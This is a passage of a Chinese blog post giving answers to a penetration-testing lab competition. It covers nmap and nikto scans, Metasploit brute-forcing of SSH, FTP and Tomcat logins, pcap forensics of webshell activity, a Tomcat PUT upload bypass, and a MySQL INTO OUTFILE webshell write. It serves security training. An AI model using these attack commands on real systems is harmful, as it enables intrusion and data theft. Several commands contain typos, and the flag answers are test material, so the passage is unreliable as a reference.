<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="一次某平台上面的题目解题过程, 后来听着风 看着秋 孤独的人总是不会善言辞. yunhea的博客">
    <meta name="description" content="一次某平台上面的题目解题过程">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>一次某平台上面的题目解题过程 | yunhea的博客</title>
    <link rel="icon" type="image/x-icon, image/vnd.microsoft.icon" href="/medias/favicon.ico">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    
    <script src="/libs/jquery/jquery.min.js"></script>
    
<meta name="generator" content="Hexo 5.4.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="yunhea的博客" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper head-container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/favicon.ico" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">yunhea的博客</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
    
    <li class="hide-on-med-and-down nav-item">
        
        <a href="/" class="waves-effect waves-light">
            
            <i class="fas fa-home" style="zoom: 0.6;"></i>
            
            <span>首页</span>
        </a>
        
    </li>
    
    <li class="hide-on-med-and-down nav-item">
        
        <a href="/tags" class="waves-effect waves-light">
            
            <i class="fas fa-tags" style="zoom: 0.6;"></i>
            
            <span>标签</span>
        </a>
        
    </li>
    
    <li class="hide-on-med-and-down nav-item">
        
        <a href="/categories" class="waves-effect waves-light">
            
            <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
            
            <span>分类</span>
        </a>
        
    </li>
    
    <li class="hide-on-med-and-down nav-item">
        
        <a href="/archives" class="waves-effect waves-light">
            
            <i class="fas fa-archive" style="zoom: 0.6;"></i>
            
            <span>归档</span>
        </a>
        
    </li>
    
    <li class="hide-on-med-and-down nav-item">
        
        <a href="/about" class="waves-effect waves-light">
            
            <i class="fas fa-address-book" style="zoom: 0.6;"></i>
            
            <span>关于</span>
        </a>
        
    </li>
    
    <li class="hide-on-med-and-down nav-item">
        
        <a href="/friends" class="waves-effect waves-light">
            
            <i class="fas fa-link" style="zoom: 0.6;"></i>
            
            <span>友链</span>
        </a>
        
    </li>
    
    <li class="hide-on-med-and-down nav-item">
        
        <a href="/contact" class="waves-effect waves-light">
            
            <i class="fas fa-comment" style="zoom: 0.6;"></i>
            
            <span>留言</span>
        </a>
        
    </li>
    
    <li>
        <a href="#searchModal" class="modal-trigger waves-effect waves-light">
            <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
        </a>
    </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/favicon.ico" class="logo-img circle responsive-img">
        
        <div class="logo-name">yunhea的博客</div>
        <div class="logo-desc">
            
            后来听着风 看着秋 孤独的人总是不会善言辞.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
            
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa-fw fas fa-home"></i>
                
                首页
            </a>
            
        </li>
        
        <li class="m-nav-item">
            
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa-fw fas fa-tags"></i>
                
                标签
            </a>
            
        </li>
        
        <li class="m-nav-item">
            
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa-fw fas fa-bookmark"></i>
                
                分类
            </a>
            
        </li>
        
        <li class="m-nav-item">
            
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa-fw fas fa-archive"></i>
                
                归档
            </a>
            
        </li>
        
        <li class="m-nav-item">
            
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa-fw fas fa-address-book"></i>
                
                
            </a>
            
        </li>
        
        <li class="m-nav-item">
            
            <a href="/friends" class="waves-effect waves-light">
                
                <i class="fa-fw fas fa-link"></i>
                
                友链
            </a>
            
        </li>
        
        <li class="m-nav-item">
            
            <a href="/contact" class="waves-effect waves-light">
                
                <i class="fa-fw fas fa-comment"></i>
                
                留言
            </a>
            
        </li>
        
        
        <li><div class=" divider">
</div>
</li>
<li>
    <a href="https://github.com/yunheb" class="waves-effect waves-light" target="_blank">
        <i class="fab fa-github-square fa-fw"></i>GitHub
    </a>
</li>

</ul>
</div>
        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/yunheb" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="GitHub" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>






    <div class="bg-cover pd-header post-cover" style="background-image: url('0')">
	
        <style>
            #index-video {
                z-index: -1;
                position: absolute;
                top: 150;
                left: 0;
                height: 110vh;
                width: 100%;
                object-fit: cover;
				
				transform:translateY(30%);/**下移元素**/
				-ms-transform:translateY(20%);
				-webkit-transform:translateY(10%);
            }

            @media only screen and (max-width: 760px) {
                #index-video {
                    display: none;
                }
            }

            @media only screen and (min-width: 760px) {
                .bg-cover {
                    background-image: none !important;
                }
            }
        </style>
        <video id="index-video" autoplay loop muted>
            <source
                src="https://v2.kwaicdn.com/upic/2023/04/24/15/BMjAyMzA0MjQxNTA0NDhfMzU5MDEyODg1XzEwMTM4MTIzNTMwMV8xXzM=_b_B943146c022b88f08998e51664519c4c4.mp4?pkey=AAWCwWLeLdnx1XK9e8POoVlUyVOGVwLjMd-lvAH3lbZ6iaNiMFaU1L4M5MGB1IwZSzAIYK8SC7T3srElNcfrZtpfUXhIt3DFtvr-MhO961JTMpRiDeF0qbJqPtsnre7V_zw&tag=1-1682320160-unknown-0-nsqwu9qgih-dd84d4ef6ddfd891&clientCacheKey=3xrca2n48sca9uy_b.mp4">

        </video>

        <div class="container" style="right: 0px;left: 0px;">

            <div class="row">
                <div class="col s12 m12 l12">
                    <div class="brand">
                        <h1 class="description center-align post-title">
                            一次某平台上面的题目解题过程
                        </h1>
                    </div>
                </div>
            </div>
        </div>
    </div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web%E6%B8%97%E9%80%8F/">
                                <span class="chip bg-color">-web渗透</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/web%E6%B8%97%E9%80%8F/" class="post-category">
                                -web渗透
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2021-11-03
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    4.6k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    17 分
                </div>
                
				
                
            </div>
            
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="任务一：namp扫描测试"><a href="#任务一：namp扫描测试" class="headerlink" title="任务一：namp扫描测试"></a>任务一：namp扫描测试</h2><ul>
<li>1.在本地PC渗透测试平台Kali中使用nmap工具查看本地路由与接口,并将该操作使用的全部命令作为FLAG提交；</li>
</ul>
<p>​        <code>nmap --iflist 172.16.101.250</code>  </p>
<p><img src="https://s2.loli.net/2023/04/21/Yk8dR4Bot2L3bh6.png"></p>
<ul>
<li>2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行VNC服务扫描渗透测试，并将使用的脚本名称作为FLAG提交（例mysql-brute.nse）；</li>
</ul>
<p>​        <code>nmap --script vnc-brute.nse - p 5900 172.16.101.250</code></p>
<p>​        <code>    vnc-info.nse</code></p>
<p><img src="https://s2.loli.net/2023/04/21/jhxTcqAtg5X8LUB.png"></p>
<ul>
<li>3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行VNC服务扫描渗透测试，并将该操作显示结果中VNC版本号作为FLAG提交； </li>
</ul>
<p>​        <code>nmap --script vnc-brute -A 5900 172.16.101.250</code></p>
<p>​        可能是 <code>nmap --script vnc-info.nse 172.16.101.250</code></p>
<ul>
<li>4.在本地PC渗透测试平台Kali中使用nmap发送空的UDP数据对类DNS服务avahi进行拒绝服务攻击，并将使用的脚本名称作为FLAG提交（例mysql-brute.nse）；</li>
</ul>
<p>​        <code>nmap -broadcast-avahi-dos.nes 172.16.101.250</code></p>
<ul>
<li>5.通过本地 PC 中渗透测试平台 Kali 对服务器场景 Linux 进行模糊测试，来发送异常的包到靶机服务器，探测出隐藏在服务器中的漏洞 ，并将使用的脚本名称作为 FLAG 提交（例 mysql-brute.nse）； </li>
</ul>
<p>​        <code>nmap --script dns-fuzz.nse 172.16.101.250</code></p>
<ul>
<li>6.在本地 PC 渗透测试平台 Kali 中使用 zenmap 工具扫描服务器场景可能存在远程任意代码执行漏洞，并将使用的脚本名称的字符串作为 FLAG 提交; （例mysql-brute.nse）； </li>
</ul>
<p>​        <code>nmap --script http-shellshock.nse 172.16.101.250</code></p>
<ul>
<li>7.在本地PC渗透测试平台Kali中使用zenmap工具扫描服务器场景可能存在远程任意代码执行漏洞（提示：检测路径为/cgi-bin/bin，需添加–script-args uri=/cgi-bin/bin参数），并将该操作显示结果中漏洞编号和发布时间作为FLAG提交（漏洞编号和发布时间的字符串之间以分号隔开）。</li>
</ul>
<p>​         <code>nmap -sV -p- --script http-shellshock --script-args uri=cgi-binbin,cmd=ls 192.168.3.0/24</code></p>
<h2 id="任务二、nmap扫描渗透测试2"><a href="#任务二、nmap扫描渗透测试2" class="headerlink" title="任务二、nmap扫描渗透测试2"></a>任务二、nmap扫描渗透测试2</h2><ul>
<li>1.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试（使用工具nikto，查看该命令的完整帮助文件），并将该操作使用命令中固定不变的字符串作为Flag提交； </li>
</ul>
<p>​        <code>nikto -H</code></p>
<ul>
<li>2.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试（使用工具nikto，扫描目标服务器8080端口，检测其开放状态），并将该操作使用命令中固定不变的字符串作为Flag提交（目标地址以<strong><a target="_blank" rel="noopener" href="http://10.10.10.1/">http://10.10.10.1</a></strong>来表示）； </li>
</ul>
<p>​        <code>nikto -h http://10.10.10.1:8080</code></p>
<p>​        <code>nikto -h 172.16.101.250 -p 8080</code>                    </p>
<p>​     <img src="https://s2.loli.net/2023/04/21/d25AYBRFbPuCx86.png">                               </p>
<ul>
<li>3.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试（使用工具nikto，扫描目标服务器80端口），将回显信息中apache服务的版本参数作为flag提交；</li>
</ul>
<p>​        <code>nikto -h 172.16.101.250</code></p>
<p><img src="https://s2.loli.net/2023/04/21/gUm1hXt6pkqESIR.png" alt="4"></p>
<p>​        <strong>Apache/2.2.15 (CentOS)</strong></p>
<ul>
<li>4.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试（使用工具nikto，扫描目标服务器80端口），将回显信息中php的版本参数作为flag提交；</li>
</ul>
<p>​        <strong>PHP/5.3.3</strong></p>
<p>   <img src="https://s2.loli.net/2023/04/21/gUm1hXt6pkqESIR.png"></p>
<ul>
<li>5.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试（使用工具nikto，扫描cgi-bin目录的文件），将该操作使用的命令中固定不变的字符串作为Flag（目标地址以：<a target="_blank" rel="noopener" href="http://10.10.10.1来表示)提交;/">http://10.10.10.1来表示）提交；</a></li>
</ul>
<p>​        <strong>目录扫描</strong></p>
<p>​        <code>nikto -h http://10.10.10.1 -Cgidirs /cgi-bin/</code></p>
<p>​         <code>nikto -Cgidirs cgi-bin -h http://172.16.101.250</code></p>
<ul>
<li>6.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试，使用工具nikto并结合nmap的扫描结果进行扫描，首先使用nmap工具对靶机所在网段的80端口进行扫描，并将扫描结果以输出至所有格式的方式输出到指定文件target中，将输出至所有格式需要用到的参数作为flag提交； </li>
</ul>
<p>​        <strong>oA</strong></p>
<p>​        <code>map - F -oA targer 172.16.101.250</code></p>
<p> <img src="https://s2.loli.net/2023/04/21/h276i1jXp5uLDPW.png"></p>
<p>  <img src="https://s2.loli.net/2023/04/21/tVJMOST3dXuvqkE.png"></p>
<ul>
<li>7.通过本地PC中渗透测试平台Kali对服务器场景Linux进行Web扫描渗透测试，使用工具nikto扫描第六题生成的target文件中的网站，并将该操作使用的所有命令作为FLAG提交。</li>
</ul>
<p>​        <code>nikto -host target.gnmap</code></p>
<p>  <img src="https://s2.loli.net/2023/04/21/xYegzlbBvt3qIVU.png"></p>
<h2 id="任务三：SSH弱口令渗透测试"><a href="#任务三：SSH弱口令渗透测试" class="headerlink" title="任务三：SSH弱口令渗透测试"></a>任务三：SSH弱口令渗透测试</h2><ul>
<li>1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景Linux所在网段(例如：172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为FLAG提交（忽略ip地址）； </li>
</ul>
<p>​        <strong>-p 21,22,23</strong></p>
<p>​        <code>nmap -sS 172.16.101.0/24 -p 21,22,23</code> </p>
<p> <img src="https://s2.loli.net/2023/04/21/jrgyKJfVUxOEkqA.png"></p>
<ul>
<li>2.通过本地PC中渗透测试平台BT5对服务器场景Linux进行系统服务及版本扫描渗透测试，并将该操作显示结果中SSH服务对应的服务端口信息作为FLAG提交；</li>
</ul>
<p>​        <strong>22/tcp</strong></p>
<p>​        <code>nmap -O 172.16.101.250</code>  </p>
<p> <img src="https://s2.loli.net/2023/04/21/KHx7DrV4g6PZy1l.png"></p>
<ul>
<li>3.在本地PC渗透测试平台BT5中使用MSF模块对其爆破，使用search命令，并将扫描弱口令模块的名称信息作为FLAG提交；</li>
</ul>
<p>​         <strong>auxiliary/scanner/ssh/ssh_login</strong></p>
<ul>
<li>4.在上一题的基础上使用命令调用该模块，并查看需要配置的信息（使用show options命令），将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交（之间以英文逗号分隔，例hello,test，..,..）； </li>
</ul>
<p><strong>RHOSTS,PASS_FILE,THREADS,USERNAME （ip地址，密码文件的地址，线程，用户名）</strong></p>
<ul>
<li>5.在msf模块中配置目标靶机IP地址，将配置命令中的前两个单词作为FLAG提交； </li>
</ul>
<p>​    <strong>set RHOSTS</strong></p>
<p>​    <strong>同上</strong></p>
<ul>
<li>6.在msf模块中指定密码字典，字典路径为/root/2.txt，用户名为test爆破获取密码并将得到的密码作为FLAG提交；</li>
</ul>
<p>​         <strong>aaabc3</strong></p>
<ul>
<li>7.在上一题的基础上，使用第6题获取到的密码SSH到靶机，将test用户家目录中唯一一个后缀为.bmp图片的文件名的字符串作为FLAG提交。 </li>
</ul>
<p>​        <strong>ssh <a href="mailto:test@172.16.101.250">test@172.16.101.250</a></strong></p>
<p>​        <code>nauiwrevy</code></p>
<p><img src="https://s2.loli.net/2023/04/21/KHx7DrV4g6PZy1l.png"></p>
<h2 id="任务四：FTP弱口令渗透测试"><a href="#任务四：FTP弱口令渗透测试" class="headerlink" title="任务四：FTP弱口令渗透测试"></a>任务四：FTP弱口令渗透测试</h2><p>1.在本地PC渗透测试平台BT5中使用zenmap工具扫描服务器场景Windows所在网段(例如：172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该操作使用的命令中必须要添加的字符串作为FLAG提交（忽略ip地址）； </p>
<p><strong>-p 21,22,23</strong></p>
<p>2.通过本地PC中渗透测试平台BT5对服务器场景Windows进行系统服务及版本扫描渗透测试，并将该操作显示结果中FTP服务对应的服务端口信息作为FLAG提交；</p>
<p><strong>21/tcp</strong></p>
<p>3.在本地PC渗透测试平台BT5中使用MSF中模块对其爆破，使用search命令，并将扫描弱口令模块的名称信息作为FLAG提交； </p>
<p><strong>auxiliary/scanner/ftp/ftp_login</strong></p>
<p>4.在上一题的基础上使用命令调用该模块，并查看需要配置的信息（使用show options命令），将回显中需要配置的目标地址,密码使用的猜解字典,线程,账户配置参数的字段作为FLAG提交（之间以英文逗号分隔，例hello,test，..,..）； </p>
<p><strong>RHOSTS,PASS_FILE,THREADS,USERNAME</strong></p>
<p>5.在msf模块中配置目标靶机IP地址，将配置命令中的前两个单词作为FLAG提交； </p>
<p><strong>set RHOSTS</strong></p>
<p>6.在msf模块中指定密码字典，字典路径为/root/2.txt,用户名为test爆破获取密码并将得到的密码作为FLAG提交；</p>
<p><strong>133c31</strong></p>
<p>7.在上一题的基础上，使用第6题获取到的密码登陆ftp服务，将该目录中flag2.bmp的图片文件中的英文单词作为FLAG提交。</p>
<p><strong>sdfpsmdv</strong></p>
<h2 id="任务五：数据分析数字取证logs"><a href="#任务五：数据分析数字取证logs" class="headerlink" title="任务五：数据分析数字取证logs"></a>任务五：数据分析数字取证logs</h2><ol>
<li>使用Wireshark查看并分析Windows 7桌面下的logs.pcapng数据包文件，通过分析数据包logs.pcapng找出恶意用户目录扫描的第9个文件，并将该文件名作为FLAG（形式：[robots.txt]）提交：</li>
</ol>
<p><strong>[star.php]</strong></p>
<p><img src="https://s2.loli.net/2023/04/21/EhL2sKcIt183l5k.png"></p>
<ol start="2">
<li>继续查看数据包文件logs.pcapng，分析出恶意用户扫描了哪些端口，并将全部的端口作为FLAG（形式：[端口名1，端口名2，端口名3…，端口名n]）从低到高提交：</li>
</ol>
<p><strong>[21,80,445,1433,3306,3389,5000]</strong></p>
<p><img src="https://s2.loli.net/2023/04/24/ZEjlHybNL12fd3T.png"></p>
<ol start="3">
<li>继续查看数据包文件logs.pcapng分析出恶意用户读取服务器的文件名是什么，并将该文件名作为FLAG（形式：[robots.txt]）提交：</li>
</ol>
<p>​        <strong>[name.txt]</strong></p>
<p>​        <strong>注意读取文件大概分为两种</strong></p>
<p>​        <strong>1.木马读取</strong></p>
<p>​        <strong>1.1通过木马读取文件可以搜索木马上传成功之后的操作</strong></p>
<p>​        <strong>2.MySQL读取</strong></p>
<p>​        <strong>2.1MySQL读取文件可以通过搜索load_file函数查找</strong></p>
<p><img src="https://s2.loli.net/2023/04/21/JpeqzZ6sMXCiLtb.png"></p>
<ol start="4">
<li>继续查看数据包文件logs.pcapng分析出恶意用户写入一句话木马的路径是什么，并将该路径作为FLAG（形式：[/root/whoami/]）提交：</li>
</ol>
<p>​        <strong>[C:/phpstudy/www/]</strong></p>
<p> <img src="https://s2.loli.net/2023/04/21/N5lIjTitEqwZpBv.png"></p>
<ol start="5">
<li>继续查看数据包文件logs.pcapng分析出恶意用户连接一句话木马的密码是什么，并将一句话密码作为FLAG（形式：[一句话密码]）提交：</li>
</ol>
<p>  <img src="https://s2.loli.net/2023/04/21/zTlLmrijVyMwPtB.png"></p>
<p>​        <strong>[007]</strong></p>
<ol start="6">
<li>继续查看数据包文件logs.pcapng分析出恶意用户下载了什么文件，并将文件名及后缀作为FLAG（形式：[文件名.后缀名]）提交：</li>
</ol>
<p>​        <strong>[flag.zip]</strong></p>
<p> <img src="https://s2.loli.net/2023/04/21/zJ13euMRQx4OKLg.png"></p>
<ol start="7">
<li>继续查看数据包文件logs.pcapng将恶意用户下载的文件里面的内容作为FLAG（形式：[文件内容]）提交：</li>
</ol>
<p>​    <strong>[flag{Find You!}]</strong></p>
<h2 id="任务六-：数据分析数字取证-Bravo-1"><a href="#任务六-：数据分析数字取证-Bravo-1" class="headerlink" title="任务六 ：数据分析数字取证-Bravo-1"></a>任务六 ：数据分析数字取证-Bravo-1</h2><ol>
<li>分析Windows 7桌面下的Bravo-1.pcapng数据包文件，通过分析数据包Bravo-1.pcapng找出恶意用户目录扫描的第2个目录名，并将该目录名作为FLAG提交：</li>
</ol>
<p>​        <strong>uploads</strong></p>
<p>​    <img src="https://s2.loli.net/2023/04/21/ZqYIyS8ckN7QEoU.png"></p>
<ol start="2">
<li>继续查看数据包文件Bravo-1.pcapng，分析出恶意用户通过哪个目录写入的一句话木马，并将该目录名作为FLAG提交：</li>
</ol>
<p>​        <strong>phpmyadmin</strong></p>
<p>   <img src="https://s2.loli.net/2023/04/21/SB7bzglw5nRkKXJ.png"></p>
<ol start="3">
<li>继续查看数据包文件Bravo-1.pcapng分析出恶意用户读取了服务器什么文件，并将该文件名及后缀作为FLAG提交：</li>
</ol>
<p>​        <strong>flag.txt</strong></p>
<ol start="4">
<li>继续查看数据包文件Bravo-1.pcapng分析出恶意用户写入一句话木马的路径是什么，并将该路径作为FLAG提交：</li>
</ol>
<p>​        <strong>c:/phpstudy/www/m/shell.php</strong></p>
<ol start="5">
<li>继续查看数据包文件Bravo-1.pcapng分析出恶意用户连接一句话木马的密码是什么，并将一句话密码作为FLAG提交：</li>
</ol>
<p>​        <strong>cia</strong></p>
<ol start="6">
<li>继续查看数据包文件Bravo-1.pcapng分析出恶意用户下载了什么文件，并将文件名及后缀作为FLAG提交：</li>
</ol>
<p>​        <strong>connect.php</strong></p>
<ol start="7">
<li>继续查看数据包文件Bravo-1.pcapng将Web服务器连接的数据库名作为FLAG提交：</li>
</ol>
<p>​        <strong>kingsman</strong></p>
<h2 id="任务七：tomcat中间件安全与加固"><a href="#任务七：tomcat中间件安全与加固" class="headerlink" title="任务七：tomcat中间件安全与加固"></a>任务七：tomcat中间件安全与加固</h2><ol>
<li>通过渗透机场景kali中的工具对web服务器进行扫描，浏览web服务器网页，在首页中找到tomcat服务版本号，并将其版本号作为flag提交；</li>
</ol>
<p>​        <strong>7.0.79</strong></p>
<p>​    <img src="https://s2.loli.net/2023/04/21/PC2w85uQWODze4k.png"></p>
<ol start="2">
<li>已知此版本的tomcat具有上传漏洞，即向页面提交发送请求就会生成对应的文件。利用Burp Suite工具进行抓包，向网站首页位置提交内容为&lt;%out.print(“hello”);%&gt;文件名字为good.jsp的请求。将Burp Suite中的PUT请求作为flag提交（注：flag长度为16个单位长度）；</li>
</ol>
<p>​        <strong>PUT /good.jsp%20</strong></p>
<p>   <img src="https://s2.loli.net/2023/04/21/O2tJ5ybfMo4lBId.png"></p>
<ol start="3">
<li>通过msfconsole工具使用root目录下的的password.txt文件进行tomcat后台账户密码的破解，并将账户密码作为flag提交。（flag格式：账户_密码）；</li>
</ol>
<p>​        <a target="_blank" rel="noopener" href="http://172.16.101.247:8080/manager">http://172.16.101.247:8080/manager</a></p>
<p>​        <strong>root_admin</strong></p>
<p>​        <strong>root_zxcvbnm</strong></p>
<p>​        <strong>search tomcat   tomcat_login  Tomcat_mgr_login</strong></p>
<p>​        <strong>set rhosts ip</strong></p>
<p>​        <strong>set rport 44444</strong></p>
<p>​        <strong>set threads 5</strong> </p>
<ol start="4">
<li>用kali中的分离工具查看root目录下bm1.war文件中的flag文件，并将flag文件内容作为提交；</li>
</ol>
<p>​        <strong>sdfgghjkl</strong></p>
<ol start="5">
<li>通过第3题中的账户密码登陆网页（格式为服务器IP：8080/manager/html），将kali中root目录下的bm1.war文件上传后连接（连接地址为IP：8080/bm1/index.jsp）。在服务器中查找flag.txt文件，并将其内容作为flag提交；</li>
</ol>
<p>​        <strong>wasdsaw</strong></p>
<p><img src="https://s2.loli.net/2023/04/21/CiA8vOm15Qq6YzT.png"></p>
<ol start="6">
<li>修改tomcat配置文件内容，使tomcat可以抵御第2题中的漏洞，将修改内容作为flag提交；</li>
</ol>
<p>​        <strong>TRUE</strong></p>
<h2 id="任务八：mysql安全测试"><a href="#任务八：mysql安全测试" class="headerlink" title="任务八：mysql安全测试"></a>任务八：mysql安全测试</h2><p>​        <strong>172.16.101.249:8081</strong></p>
<ol>
<li>利用渗透机kali中的工具确定mysql的端口，将mysql端口作为flag提交；</li>
</ol>
<p>​        <strong>3358</strong></p>
<ol start="2">
<li>管理者曾在web界面登陆数据库，并执行了select ‘';system($_GET['cmd']); echo ''; ?&gt;’ INTO OUTFILE ‘C:/phpstudy/WWW/test1.php’语句，结合本执行语句使用dos命令查看服务器的详细配置信息，并将服务器的系统型号作为flag提交；</li>
</ol>
<p>​        <strong>Bochs</strong></p>
<p>​        <strong>select ‘’</strong></p>
<p>​        <strong>select ‘’ into outfile’C:/phpstudy/WWW/tes1.php’</strong></p>
<ol start="3">
